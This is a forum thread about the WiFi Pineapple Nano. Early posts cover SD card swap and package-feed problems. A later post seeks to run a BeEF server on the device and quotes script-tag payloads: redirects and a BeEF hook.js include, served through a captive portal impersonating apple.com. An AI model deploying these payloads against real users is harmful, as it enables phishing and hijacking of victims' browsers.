Setting up SD card as root to install more pkgs with opkg and use beef

telot

Loving this nano guys! Great job getting them out for the winter holidays! A couple of questions:

Has anyone setup swap using the sd card yet? I tried to follow the old MarkIV directions from the pineapple book - but to no avail. It also seems that SD cards get mounted to /mnt/sda1 and /mnt/sda2 instead of /sd by default.

Next thing, is wifipineapple package.gz seems to be down at the moment:

root@Pineapple:/sd# opkg update

wget: error getting response: Connection reset by peer
Everything else updates fine, just the wifipineapple.com fails.
telot

Wondering if I missed something on the swap topic- is there yet a prescribed way to set it up? For that matter- is there a prescribed format method for SD card on Nano? I found my Mark V to be pretty fickle on the SD format methodology, and not being a big tinkerer yet would prefer to do it "as recommended" over trial and error.

Thanks!

root@Pineapple:/sd# opkg update

wget: error getting response: Connection reset by peer

Yup, our pineapple package feed is not public yet. Will be this week though, which is when packages such as mdk3, reaver, pixiwps, sslstrip, etc will become available.

Wondering if I missed something on the swap topic- is there yet a prescribed way to set it up? For that matter- is there a prescribed format method for SD card on Nano? I found my Mark V to be pretty fickle on the SD format methodology, and not being a big tinkerer yet would prefer to do it "as recommended" over trial and error.

Thanks!

No sooner do I ask, than I find it! USB format under "Advanced" - but swap question still on the table.

The formatting option under "Advanced" will automatically create a SWAP partition, and should automatically mount after a reboot.

Best Regards,

Sebkinne

• 3 weeks later...

Topic:

Setting up SD card as root to install more pkgs with opkg

I want to install and run a beef server on the nano amd one of the dependencies is ruby and there's no room on the nano at all really and it always installs the packages in opkg in the default root folder and even if I download to the SD card it still needs to be installed to the root because that's where openwrt os files are. I've tried opkg --dest and -o which is root-offline-install but I keep getting an error in both can't find dest "/sd/opkg" or whatever folder I choose on SD card.

I want to be able to install more then a few packages from opkg so I image I'll need the space regardless. I'm sure I can run a beef server on my kali distro and share the connection from there to nano and then just load the Portal to connect to my beef hook address or just include "hook.js" in the code on no dog splash page and load there.

Example:

I got this from another site it just shows using karnasploit like the nano basically but not as easy and forwarding apple.com to your ip at the beef server and but looking like Apple.com on the captive portal and then loading payloads and the beef hook. Thing is beef server is ran on the laptop not the nano amd I want this to be able to run on its own without bringing the laptop if possible. I just don't know how slow beef and ruby would slow it down and keep cpu usage high. It might have to be ran from kali in background unless the beef hook can be hooked anywhere ane then Connect to beef control panel on my phone and load the JS payloads. If this has been tried before and it won't work for some reason enlightenment me please if it hasn't been and you have more info let me know. I'm trying to see how it can be a module somehow only thing is the control panel for beef and ruby and no api still so I'm jusy trying to figure it out on my own. This article shows a few ways of using the captive portal if anyone else with api already and more experience wants to take a look at it.

<script type=text/javascript>window.location = http://www.apple.com:8080/YOURPIX.jpg</script><!Arbitrary Redirect >

<script type=text/javascript>window.open(http://www.apple.com:8080/YOURPIX.jpg)</script><! Arbitrary Redirect >

<script type=text/javascript src=http://www.apple.com:3000/hook.js></script><!Standard BeEF Hook >

https://www.securestate.com/blog/2011/10/07/apple-os-x-lion-captive-portal-hijacking-attack

• 3 years later...